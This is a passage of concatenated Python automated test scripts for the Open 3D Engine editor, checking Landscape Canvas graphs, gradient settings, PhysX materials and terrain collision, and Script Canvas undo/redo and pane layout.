EditorTestHelper.__init__(self, log_prefix="GradientTransform_FrequencyZoomBeyondSliders", args=["level"]) def run_test(self): """ Summary: Frequency Zoom can manually be set higher than 8 in a random noise gradient Expected Behavior: The value properly changes, despite the value being outside of the slider limit Test Steps: 1) Open level 2) Create entity 3) Add components to the entity 4) Set the frequency value of the component 5) Verify if the frequency value is set to higher value Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # 1) Open level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create entity entity_position = math.Vector3(125.0, 136.0, 32.0) entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) if entity_id.IsValid(): print("Entity Created") # 3) Add components to the entity components_to_add = ["Random Noise Gradient", "Gradient Transform Modifier", "Box Shape"] entity = hydra.Entity("entity", entity_id) entity.components = [] for component in components_to_add: entity.components.append(hydra.add_component(component, entity_id)) print("Components added to the entity") # 4) Set the frequency value of the component hydra.get_set_test(entity, 1, "Configuration|Frequency Zoom", 10) # 5) Verify if the frequency value is set to higher value curr_value = hydra.get_component_property_value(entity.components[1], "Configuration|Frequency Zoom") if curr_value == 10.0: print("Frequency Zoom is equal to expected value") else: print("Frequency Zoom is not equal to expected value") test = TestGradientTransformFrequencyZoom() test.run() ``` #### File: landscape_canvas/EditorScripts/GraphClosed_TabbedGraph.py ```python import os import sys import azlmbr.bus as bus import azlmbr.editor.graph as graph import azlmbr.legacy.general as general import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) from editor_python_test_tools.editor_test_helper import EditorTestHelper editorId = azlmbr.globals.property.LANDSCAPE_CANVAS_EDITOR_ID class TestGraphClosedTabbedGraph(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="GraphClosedTabbedGraph", args=["level"]) def run_test(self): """ Summary: This test verifies that Landscape Canvas tabbed graphs can be independently closed. Expected Behavior: Closing a tabbed graph only closes the appropriate graph. Test Steps: 1) Create a new level 2) Open Landscape Canvas and create several new graphs 3) Close one of the open graphs 4) Ensure the graph properly closed, and other open graphs remain open Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # Create a new empty level self.test_success = self.create_level( self.args["level"], heightmap_resolution=128, heightmap_meters_per_pixel=1, terrain_texture_resolution=128, use_terrain=False, ) # Open Landscape Canvas tool and verify general.open_pane('Landscape Canvas') self.test_success = self.test_success and general.is_pane_visible('Landscape Canvas') if general.is_pane_visible('Landscape Canvas'): self.log('Landscape Canvas pane is open') # Create 3 new graphs in Landscape Canvas newGraphId = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId if newGraphId: self.log("New graph created") newGraphId2 = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId2 if newGraphId2: self.log("2nd new graph created") newGraphId3 = graph.AssetEditorRequestBus(bus.Event, 'CreateNewGraph', editorId) self.test_success = self.test_success and newGraphId3 if newGraphId3: self.log("3rd new graph created") # Make sure the graphs we created are open in Landscape Canvas success = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId) success2 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId2) success3 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId3) self.test_success = self.test_success and success and success2 and success3 if success and success2 and success3: self.log("Graphs registered with Landscape Canvas") # Close a single graph and verify it was properly closed and other graphs remain open success4 = graph.AssetEditorRequestBus(bus.Event, 'CloseGraph', editorId, newGraphId2) success = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId) success2 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId2) success3 = graph.AssetEditorRequestBus(bus.Event, 'ContainsGraph', editorId, newGraphId3) self.test_success = self.test_success and success and success3 and success4 and not success2 if success and success3 and success4 and not success2: self.log("Graph 2 was successfully closed") test = TestGraphClosedTabbedGraph() test.run() ``` #### File: largeworlds/landscape_canvas/test_GraphComponentSync.py ```python import os import pytest # Bail on the test if ly_test_tools doesn't exist. pytest.importorskip('ly_test_tools') import ly_test_tools.environment.file_system as file_system import ly_test_tools._internal.pytest_plugin as internal_plugin import editor_python_test_tools.hydra_test_utils as hydra test_directory = os.path.join(os.path.dirname(__file__), 'EditorScripts') @pytest.mark.parametrize('project', ['AutomatedTesting']) @pytest.mark.parametrize('level', ['tmp_level']) @pytest.mark.usefixtures("automatic_process_killer") @pytest.mark.parametrize("launcher_platform", ['windows_editor']) class TestGraphComponentSync(object): @pytest.fixture(autouse=True) def setup_teardown(self, request, workspace, project, level): def teardown(): file_system.delete([os.path.join(workspace.paths.engine_root(), project, "Levels", level)], True, True) request.addfinalizer(teardown) file_system.delete([os.path.join(workspace.paths.engine_root(), project, "Levels", level)], True, True) @pytest.mark.test_case_id('C4705586') @pytest.mark.BAT @pytest.mark.SUITE_main def test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(self, request, editor, level, launcher_platform): # Skip test if running against Debug build if "debug" in internal_plugin.build_directory: pytest.skip("Does not execute against debug builds.") cfg_args = [level] expected_lines = [ "Landscape Canvas pane is open", "New graph created", "Graph registered with Landscape Canvas", "Random Noise Gradient component Preview Entity property set to Box Shape EntityId", "Dither Gradient Modifier component Inbound Gradient property set to Random Noise Gradient EntityId", "Gradient Mixer component Inbound Gradient extendable property set to Dither Gradient Modifier EntityId", "SlotConnectionsUpdateComponents: result=SUCCESS" ] hydra.launch_and_validate_results(request, test_directory, editor, 'SlotConnections_UpdateComponentReferences.py', expected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C22715182') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_GraphUpdates_UpdateComponents(self, request, editor, level, launcher_platform): cfg_args = [level] expected_lines = [ 'Rotation Modifier component was removed from entity', 'BushSpawner entity was deleted', 'Gradient Entity Id reference was properly updated', 'GraphUpdatesUpdateComponents: result=SUCCESS' ] unexpected_lines = [ 'Rotation Modifier component is still present on entity', 'Failed to delete BushSpawner entity', 'Gradient Entity Id was not updated properly' ] hydra.launch_and_validate_results(request, test_directory, editor, 'GraphUpdates_UpdateComponents.py', expected_lines, unexpected_lines=unexpected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C22602072') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_ComponentUpdates_UpdateGraph(self, request, editor, level, launcher_platform): cfg_args = [level] expected_lines = [ "LandscapeCanvas entity found", "BushSpawner entity found", "Vegetation Distribution Filter on BushSpawner entity found", "Graph opened", "Distribution Filter node found on graph", "Vegetation Altitude Filter on BushSpawner entity found", "Altitude Filter node found on graph", "Vegetation Distribution Filter removed from BushSpawner entity", "Distribution Filter node was removed from the graph", "New entity successfully added as a child of the BushSpawner entity", "Box Shape on Box entity found", "Box Shape node found on graph", 'ComponentUpdatesUpdateGraph: result=SUCCESS' ] unexpected_lines = [ "Distribution Filter node not found on graph", "Distribution Filter node is still present on the graph", "Altitude Filter node not found on graph", "New entity added with an unexpected parent", "Box Shape node not found on graph" ] hydra.launch_and_validate_results(request, test_directory, editor, 'ComponentUpdates_UpdateGraph.py', expected_lines, unexpected_lines=unexpected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C15987206') @pytest.mark.SUITE_main def test_LandscapeCanvas_GradientMixer_NodeConstruction(self, request, editor, level, launcher_platform): """ Verifies a Gradient Mixer can be setup in Landscape Canvas and all references are property set. """ # Skip test if running against Debug build if "debug" in internal_plugin.build_directory: pytest.skip("Does not execute against debug builds.") cfg_args = [level] expected_lines = [ 'Landscape Canvas pane is open', 'New graph created', 'Graph registered with Landscape Canvas', 'Perlin Noise Gradient component Preview Entity property set to Box Shape EntityId', 'Gradient Mixer component Inbound Gradient extendable property set to Perlin Noise Gradient EntityId', 'Gradient Mixer component Inbound Gradient extendable property set to FastNoise Gradient EntityId', 'Configuration|Layers|[0]|Operation set to 0', 'Configuration|Layers|[1]|Operation set to 6', 'GradientMixerNodeConstruction: result=SUCCESS' ] hydra.launch_and_validate_results(request, test_directory, editor, 'GradientMixer_NodeConstruction.py', expected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C21333743') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_LayerBlender_NodeConstruction(self, request, editor, level, launcher_platform): """ Verifies a Layer Blender can be setup in Landscape Canvas and all references are property set. """ cfg_args = [level] expected_lines = [ 'Landscape Canvas pane is open', 'New graph created', 'Graph registered with Landscape Canvas', 'Vegetation Layer Blender component Vegetation Areas[0] property set to Vegetation Layer Spawner EntityId', 'Vegetation Layer Blender component Vegetation Areas[1] property set to Vegetation Layer Blocker EntityId', 'LayerBlenderNodeConstruction: result=SUCCESS' ] hydra.launch_and_validate_results(request, test_directory, editor, 'LayerBlender_NodeConstruction.py', expected_lines, cfg_args=cfg_args) ``` #### File: PythonTests/physics/C15096740_Material_LibraryUpdatedCorrectly.py ```python class Tests(): create_entity = ("Entity created successfully", "Failed to create Entity") add_physx_component = ("PhysX Component added successfully", "Failed to add PhysX Component") override_default_library = ("Material library overrided successfully", "Failed to override material library") update_to_default_library = ("Library updated to default", "Failed to update library to default") new_library_updated = ("New library updated successfully", "Failed to add new library") # fmt: on def C15096740_Material_LibraryUpdatedCorrectly(): """ Summary: Load level with Entity having PhysX Component. Override the material library to be the same one as the default material library. Change the default material library into another one. Expected Behavior: The material library gets updated correctly when the default material is changed. Test Steps: 1) Load the level 2) Create new Entity with PhysX Character Controller 3) Override the material library to be the same one as the default material library 4) Switch it back again to the default material library. 5) Change the default material library into another one. 6) Close the editor Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # Built-in Imports import os import ImportPathHelper as imports imports.init() # Helper file Imports from editor_python_test_tools.editor_entity_utils import EditorEntity from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper from asset_utils import Asset # Open 3D Engine Imports import azlmbr.asset as azasset # Constants library_property_path = "Configuration|Physics Material|Library" default_material_path = "surfacetypemateriallibrary.physmaterial" new_material_path = os.path.join("physicssurfaces", "default_phys_materials.physmaterial") helper.init_idle() # 1) Load the level helper.open_level("Physics", "Base") # 2) Create new Entity with PhysX Character Controller test_entity = EditorEntity.create_editor_entity("TestEntity") Report.result(Tests.create_entity, test_entity.id.IsValid()) test_component = test_entity.add_component("PhysX Character Controller") Report.result(Tests.add_physx_component, test_entity.has_component("PhysX Character Controller")) # 3) Override the material library to be the same one as the default material library default_asset = Asset.find_asset_by_path(default_material_path) test_component.set_component_property_value(library_property_path, default_asset.id) default_asset.id = test_component.get_component_property_value(library_property_path) Report.result(Tests.override_default_library, default_asset.get_path() == default_material_path) # 4) Switch it back again to the default material library. test_component.set_component_property_value(library_property_path, azasset.AssetId()) Report.result( Tests.update_to_default_library, test_component.get_component_property_value(library_property_path) == azasset.AssetId(), ) # 5) Change the default material library into another one. new_asset = Asset.find_asset_by_path(new_material_path) test_component.set_component_property_value(library_property_path, new_asset.id) new_asset.id = test_component.get_component_property_value(library_property_path) Report.result(Tests.new_library_updated, new_asset.get_path() == new_material_path.replace(os.sep, '/')) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(C15096740_Material_LibraryUpdatedCorrectly) ``` #### File: PythonTests/physics/C15563573_Material_AddModifyDeleteOnCharacterController.py ```python class Tests: enter_game_mode_0 = ("Test 0) Entered game mode", "Test 0) Failed to enter game mode") find_default_controller_0 = ("Test 0) The default controller entity was found", "Test 0) The default controller entity was not found") find_modified_controller_0 = ("Test 0) The modified controller entity was found", "Test 0) The modified controller entity was not found") find_on_default_box_0 = ("Test 0) Box on default was found", "Test 0) Box on default was not found") find_on_modified_box_0 = ("Test 0) Box on modified was found", "Test 0) Box on modified was not found") boxes_moved_0 = ("Test 0) All boxes moved", "Test 0) Boxes failed to move") boxes_at_rest_0 = ("Test 0) All boxes came to rest", "Test 0) Boxes failed to come to rest") exit_game_mode_0 = ("Test 0) Exited game mode", "Test 0) Failed to exit game mode") default_less_than_modified = ("Test 0) Modified box traveled farther than default", "Test 0) Modified box did not travel farther than default") enter_game_mode_1 = ("Test 1) Entered game mode", "Test 1) Failed to enter game mode") find_default_controller_1 = ("Test 1) The default controller entity was found", "Test 1) The default controller entity was not found") find_modified_controller_1 = ("Test 1) The modified controller entity was found", "Test 1) The modified controller entity was not found") find_on_default_box_1 = ("Test 1) Box on default was found", "Test 1) Box on default was not found") find_on_modified_box_1 = ("Test 1) Box on modified was found", "Test 1) Box on modified was not found") boxes_moved_1 = ("Test 1) All boxes moved", "Test 1) Boxes failed to move") boxes_at_rest_1 = ("Test 1) All boxes came to rest", "Test 1) Boxes failed to come to rest") exit_game_mode_1 = ("Test 1) Exited game mode", "Test 1) Failed to exit game mode") modified_less_than_default = ("Test 1) Modified box traveled less than default", "Test 1) Modified box traveled farther than default") enter_game_mode_2 = ("Test 2) Entered game mode", "Test 2) Failed to enter game mode") find_default_controller_2 = ("Test 2) The default controller entity was found", "Test 2) The default controller entity was not found") find_modified_controller_2 = ("Test 2) The modified controller entity was found", "Test 2) The modified controller entity was not found") find_on_default_box_2 = ("Test 2) Box on default was found", "Test 2) Box on default was not found") find_on_modified_box_2 = ("Test 2) Box on modified was found", "Test 2) Box on modified was not found") boxes_moved_2 = ("Test 2) All boxes moved", "Test 2) Boxes failed to move") boxes_at_rest_2 = ("Test 2) All boxes came to rest", "Test 2) Boxes failed to come to rest") exit_game_mode_2 = ("Test 2) Exited game mode", "Test 2) Failed to exit game mode") default_equals_modified = ("Test 2) Modified and Default boxes traveled the same distance", "Test 2) Modified and Default boxes did not travel the same distance") # fmt: on def C15563573_Material_AddModifyDeleteOnCharacterController(): """ Summary: Runs an automated test to verify that any change (Add/Delete/Modify) made to the material surface in the material library reflects immediately in the PhysX Character Controller Level Description: There are two groups of entities, one for "modified" and one for "default". Each group has two entities: one box, with PhysX Rigid Body and PhysX Box Collider one character controller, with PhysX Character Controller - configured as a box shape The box entity for each group sits on top of its respective character controller entity. The boxes are identical and have the default physX material assigned. The character controller "default_controller" is assigned the default physx material. A new material library was created with 1 material, called "Modified", this is assigned to "modified_controller" dynamic friction: 0.25 static friction: 0.5 restitution: 0.5 Expected behavior: For every iteration this test applies a force impulse in the X direction to each box. The boxes save their traveled distances each iteration, to verify different behavior between each setup. First the test verifies the two controllers are assigned differing materials, without changing anything. With a lower dynamic friction coefficient, the box 'on_modified' should travel a longer distance than 'on_default' Next, the test modifies the dynamic friction value for 'modified_controller' (from 0.25 to 0.75). 'on_modified' should travel a shorter distance than it did in the previous test, and less than 'default' Finally, we delete the 'modified' material entirely. The box 'on_modified' should then behave as 'on_default' box, and travel the same distance. Test Steps: 1) Open level 2) Collect basis values without modifying anything 2.1) Enter game mode 2.2) Find entities 2.3) Push the boxes and wait for them to come to rest 2.4) Exit game mode 3) Modify the dynamic friction value of 'modified' 3.1 - 3.4) <same as above> 4) Delete 'modified's' material 4.1 - 4.4) <same as above> 5) Close editor Notes: - As of 20/02/2020, we do not have any capabilities to automate the UI part of the test case. Nor can we 'Add' any new mesh surface in a material library by modifying the ".physmaterial" file as it requires a UUID. Hence, in order to validate that the modification/deletion of mesh surfaces from material library are reflected in the allocated material in Character Controller, we will verify the change in behaviour of the Character Controller occurring due to change in mesh surfaces, during the game mode. - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ import os import sys import ImportPathHelper as imports imports.init() import azlmbr.legacy.general as general import azlmbr.math as lymath from Physmaterial_Editor import Physmaterial_Editor from AddModifyDelete_Utils import Box from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper FORCE_IMPULSE = lymath.Vector3(5.0, 0.0, 0.0) TIMEOUT = 3.0 DISTANCE_TOLERANCE = 0.001 def get_test(test_name): return Tests.__dict__[test_name] def run_test(test_number): # x.1) Enter game mode helper.enter_game_mode(get_test("enter_game_mode_{}".format(test_number))) # x.2) Find entities default_controller_id = general.find_game_entity("default_controller") modified_controller_id = general.find_game_entity("modified_controller") Report.result(get_test("find_default_controller_{}".format(test_number)), default_controller_id.IsValid()) Report.result(get_test("find_modified_controller_{}".format(test_number)), modified_controller_id.IsValid()) Report.result(get_test("find_on_default_box_{}".format(test_number)), default_box.find()) Report.result(get_test("find_on_modified_box_{}".format(test_number)), modified_box.find()) # x.3) Push the boxes and wait for them to come to rest default_box.push(FORCE_IMPULSE) modified_box.push(FORCE_IMPULSE) def boxes_are_moving(): return not default_box.is_stationary() and not modified_box.is_stationary() def boxes_are_stationary(): return default_box.is_stationary() and modified_box.is_stationary() Report.result( get_test("boxes_moved_{}".format(test_number)), helper.wait_for_condition(boxes_are_moving, TIMEOUT), ) Report.result( get_test("boxes_at_rest_{}".format(test_number)), helper.wait_for_condition(boxes_are_stationary, TIMEOUT), ) default_box.distances.append(default_box.position.GetDistance(default_box.start_position)) modified_box.distances.append(modified_box.position.GetDistance(modified_box.start_position)) # x.4) Exit game mode helper.exit_game_mode(get_test("exit_game_mode_{}".format(test_number))) # 1) Open level and enter game mode helper.init_idle() helper.open_level("Physics", "C15563573_Material_AddModifyDeleteOnCharacterController") # Setup persisting entities default_box = Box("on_default") modified_box = Box("on_modified") # 2) Collect basis values without modifying anything run_test(0) # While sitting on a character controller with friction of 0.25, 'on_modified' should travel farther than 'default' Report.result(Tests.default_less_than_modified, default_box.distances[0] < modified_box.distances[0]) # 3) Modify the dynamic friction value of 'modified' material_editor = Physmaterial_Editor("c15563573_material_addmodifydeleteoncharactercontroller.physmaterial") material_editor.modify_material("Modified", "DynamicFriction", 0.75) material_editor.save_changes() run_test(1) # With greater friction, 'on_modified' should now travel a shorter distance than it did in the previous test. Report.result(Tests.modified_less_than_default, default_box.distances[0] > modified_box.distances[1]) # 4) Delete 'modified's material material_editor.delete_material("Modified") material_editor.save_changes() run_test(2) Report.result( Tests.default_equals_modified, lymath.Math_IsClose(default_box.distances[2], modified_box.distances[2], DISTANCE_TOLERANCE), ) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(C15563573_Material_AddModifyDeleteOnCharacterController) ``` #### File: PythonTests/physics/C3510642_Terrain_NotCollideWithTerrain.py ```python class Tests(): enter_game_mode = ("Entered game mode", "Failed to enter game mode") find_box = ("Box entity found", "Box entity not found") find_bumper = ("Bumper box found", "Bumper box not found") box_above_terrain = ("The tester box is above terrain", "The test box is not higher than the terrain") bumper_below_terrain = ("The bumper is below terrain", "The bumper is not lower than the terrain") gravity_works = ("Box fell", "Box did not fall") falls_below_terrain_height = ("Box is below terrain", "Box did not fall below terrain before timeout") collision_underground = ("Box collided underground", "Box did not collide underground before timeout") exit_game_mode = ("Exited game mode", "Couldn't exit game mode") # fmt: on def C3510642_Terrain_NotCollideWithTerrain(): """ Summary: Runs an automated test to ensure that when no PhysX Terrain component is added, PhysX objects will not collide with terrain. Level Description: Box (entity) - suspended over the terrain with gravity enabled; contains a box mesh, PhysX Collider (Box shape), and PhysX RigidBody Bumper (entity) - suspended under the terrain with gravity disabled; contains box mesh, PhysX Collider (Box shape), and PhysX RigidBody Expected Behavior: When game mode is entered, the Box entity will experience gravity and fall toward the terrain. Since there is no PhysX Terrain component in the level, it should fall through the terrain. Once it passes through the terrain, it will collide with the Bumper entity in order to prove that it has passed the terrain. Test Steps: 1) Open level 2) Enter game mode 3) Find the entities 4) Get the starting z position of the boxes 5) Check and report that the entities are at the correct heights 6) Check that the gravity works and the box falls 7) Check that the box hits the trigger and is below the terrain 8) Exit game mode 9) Close the editor Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ import os import sys import ImportPathHelper as imports imports.init() import azlmbr.legacy.general as general import azlmbr.bus from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper # Constants TIMEOUT = 2.0 TERRAIN_HEIGHT = 32.0 # Default height of the terrain MIN_BELOW_TERRAIN = 0.5 # Minimum height below terrain the box must be in order to be 'under' it helper.init_idle() # 1) Open level helper.open_level("Physics", "C3510642_Terrain_NotCollideWithTerrain") # 2) Enter game mode helper.enter_game_mode(Tests.enter_game_mode) # 3) Find the entities box_id = general.find_game_entity("Box") Report.critical_result(Tests.find_box, box_id.IsValid()) bumper_id = general.find_game_entity("Bumper") Report.critical_result(Tests.find_bumper, bumper_id.IsValid()) # 4) Get the starting z position of the boxes class Box: """ Class to hold boolean values for test checks. Attributes: start_position_z: The initial z position of the box position_z : The z position of the box fell : When the box falls any distance below its original position, the value should be set True below_terrain : When the box falls below the specified terrain height, the value should be set True """ start_position_z = None position_z = None fell = False below_terrain = False Box.start_position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) bumper_start_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", bumper_id) # 5) Check that the test box is above the terrain and the bumper box is below terrain Report.info("Terrain Height: {}".format(TERRAIN_HEIGHT)) Report.info("Box start height: {}".format(Box.start_position_z)) Report.result(Tests.box_above_terrain, Box.start_position_z > TERRAIN_HEIGHT) Report.info("Bumper start height: {}".format(bumper_start_z)) Report.result(Tests.bumper_below_terrain, bumper_start_z < TERRAIN_HEIGHT) # 6) Check that the gravity works and the box falls def box_fell(): if not Box.fell: Box.position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) if Box.position_z < Box.start_position_z: Report.info("Box position is now lower than the starting position") Box.fell = True return Box.fell helper.wait_for_condition(box_fell, TIMEOUT) Report.result(Tests.gravity_works, Box.fell) # 7) Check that the box hits the trigger and is below the terrain # Setup for collision check class BumperTriggerEntered: value = False def on_collision_begin(args): other_id = args[0] if other_id.Equal(bumper_id): BumperTriggerEntered.value = True handler = azlmbr.physics.CollisionNotificationBusHandler() handler.connect(box_id) handler.add_callback("OnCollisionBegin", on_collision_begin) def box_below_terrain(): if not Box.below_terrain: Box.position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) if Box.position_z < (TERRAIN_HEIGHT - MIN_BELOW_TERRAIN): Report.info("Box position is now below the terrain") Box.below_terrain = True return Box.below_terrain def box_below_and_trigger_entered(): return box_below_terrain() and BumperTriggerEntered.value helper.wait_for_condition(box_below_and_trigger_entered, TIMEOUT) Report.result(Tests.collision_underground, BumperTriggerEntered.value) Report.result(Tests.falls_below_terrain_height, Box.below_terrain) # 8) Exit game mode helper.exit_game_mode(Tests.exit_game_mode) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(C3510642_Terrain_NotCollideWithTerrain) ``` #### File: PythonTests/scripting/EditMenu_Default_UndoRedo.py ```python class Tests(): variable_created = ("New variable created", "New variable not created") undo_worked = ("Undo action working", "Undo action did not work") redo_worked = ("Redo action working", "Redo action did not work") # fmt: on def EditMenu_Default_UndoRedo(): """ Summary: Edit > Undo undoes the last action Edit > Redo redoes the last undone action We create a new variable in variable manager, undo and verify if variable is removed, redo it and verify if the variable is created again. Expected Behavior: The last action is undone upon selecting Undo. The last undone action is redone upon selecting Redo. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Get the SC window object 3) Open Variable Manager if not opened already 4) Create Graph 5) Create new variable 6) Verify if the variable is created initially 7) Trigger Undo action and verify if variable is removed in Variable Manager 8) Trigger Redo action and verify if variable is re-added in Variable Manager 9) Close SC window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ from PySide2 import QtWidgets, QtCore import pyside_utils import azlmbr.legacy.general as general # 1) Open Script Canvas window general.idle_enable(True) general.open_pane("Script Canvas") # 2) Get the SC window object editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") # 3) Open Variable Manager if not opened already if sc.findChild(QtWidgets.QDockWidget, "VariableManager") is None: action = pyside_utils.find_child_by_pattern(sc, {"text": "Variable Manager", "type": QtWidgets.QAction}) action.trigger() variable_manager = sc.findChild(QtWidgets.QDockWidget, "VariableManager") # 4) Create Graph action = pyside_utils.find_child_by_pattern(sc, {"objectName": "action_New_Script", "type": QtWidgets.QAction}) action.trigger() # 5) Create new variable add_button = variable_manager.findChild(QtWidgets.QPushButton, "addButton") add_button.click() # Click on Create Variable button # Select variable type table_view = variable_manager.findChild(QtWidgets.QTableView, "variablePalette") model_index = pyside_utils.find_child_by_pattern(table_view, "Boolean") # Click on it to create variable pyside_utils.item_view_index_mouse_click(table_view, model_index) # 6) Verify if the variable is created initially graph_vars = variable_manager.findChild(QtWidgets.QTableView, "graphVariables") result = graph_vars.model().rowCount(QtCore.QModelIndex()) == 1 # since we added 1 variable, rowcount=1 Report.result(Tests.variable_created, result) # 7) Trigger Undo action and verify if variable is removed in Variable Manager action = sc.findChild(QtWidgets.QAction, "action_Undo") action.trigger() result = graph_vars.model().rowCount(QtCore.QModelIndex()) == 0 # since we triggered undo, rowcount=0 Report.result(Tests.undo_worked, result) # 8) Trigger Redo action and verify if variable is readded in Variable Manager action = sc.findChild(QtWidgets.QAction, "action_Redo") action.trigger() result = ( graph_vars.model().rowCount(QtCore.QModelIndex()) == 1 ) # since action is redone 1 variable is readded, rowcount=1 Report.result(Tests.redo_worked, result) # 9) Close SC window general.close_pane("Script Canvas") if __name__ == "__main__": import ImportPathHelper as imports imports.init() from utils import Report Report.start_test(EditMenu_Default_UndoRedo) ``` #### File: PythonTests/scripting/Pane_Default_RetainOnSCRestart.py ```python class Tests(): relaunch_sc = ("Script Canvas window is relaunched", "Failed to relaunch Script Canvas window") test_panes_visible = ("All the test panes are opened", "Failed to open one or more test panes") close_pane_1 = ("Test pane 1 is closed", "Failed to close test pane 1") visibility_retained = ("Test pane retained its visibility on SC restart", "Failed to retain visibility of test pane on SC restart") resize_pane_3 = ("Test pane 3 resized successfully", "Failed to resize Test pane 3") size_retained = ("Test pane retained its size on SC restart", "Failed to retain size of test pane on SC restart") location_changed = ("Location of test pane 2 changed successfully", "Failed to change location of test pane 2") location_retained = ("Test pane retained its location on SC restart", "Failed to retain location of test pane on SC restart") # fmt: on def Pane_Default_RetainOnSCRestart(): """ Summary: The Script Canvas window is opened to verify if Script canvas panes can retain its visibility, size and location upon ScriptCanvas restart. Expected Behavior: The ScriptCanvas pane retain it's visibility, size and location upon ScriptCanvas restart. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Make sure test panes are open and visible 3) Close test pane 1 4) Change dock location of test pane 2 5) Resize test pane 3 6) Relaunch Script Canvas 7) Verify if test pane 1 retain its visibility 8) Verify if location of test pane 2 is retained 9) Verify if size of test pane 3 is retained 10) Restore default layout and close SC window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # Pyside imports from PySide2 import QtCore, QtWidgets from PySide2.QtCore import Qt # Helper imports from utils import Report from utils import TestHelper as helper import pyside_utils # Open 3D Engine Imports import azlmbr.legacy.general as general TEST_PANE_1 = "NodePalette" # test visibility TEST_PANE_2 = "VariableManager" # test location TEST_PANE_3 = "NodeInspector" # test size SCALE_INT = 10 # Random resize scale integer DOCKAREA = Qt.TopDockWidgetArea # Preferred top area since no widget is docked on top def click_menu_option(window, option_text): action = pyside_utils.find_child_by_pattern(window, {"text": option_text, "type": QtWidgets.QAction}) action.trigger() def find_pane(window, pane_name): return window.findChild(QtWidgets.QDockWidget, pane_name) # Test starts here general.idle_enable(True) # 1) Open Script Canvas window (Tools > Script Canvas) general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 3.0) # 2) Make sure test panes are open and visible editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") click_menu_option(sc, "Restore Default Layout") test_pane_1 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_1) test_pane_2 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_2) test_pane_3 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_3) Report.result( Tests.test_panes_visible, test_pane_1.isVisible() and test_pane_2.isVisible() and test_pane_3.isVisible() ) # Initiate try block here to restore default in finally block try: # 3) Close test pane test_pane_1.close() Report.result(Tests.close_pane_1, not test_pane_1.isVisible()) # 4) Change dock location of test pane 2 sc_main = sc.findChild(QtWidgets.QMainWindow) sc_main.addDockWidget(DOCKAREA, find_pane(sc_main, TEST_PANE_2), QtCore.Qt.Vertical) Report.result(Tests.location_changed, sc_main.dockWidgetArea(find_pane(sc_main, TEST_PANE_2)) == DOCKAREA) # 5) Resize test pane 3 initial_size = test_pane_3.frameSize() test_pane_3.resize(initial_size.width() + SCALE_INT, initial_size.height() + SCALE_INT) new_size = test_pane_3.frameSize() resize_success = ( abs(initial_size.width() - new_size.width()) == abs(initial_size.height() - new_size.height()) == SCALE_INT ) Report.result(Tests.resize_pane_3, resize_success) # 6) Relaunch Script Canvas general.close_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 2.0) general.open_pane("Script Canvas") sc_visible = helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 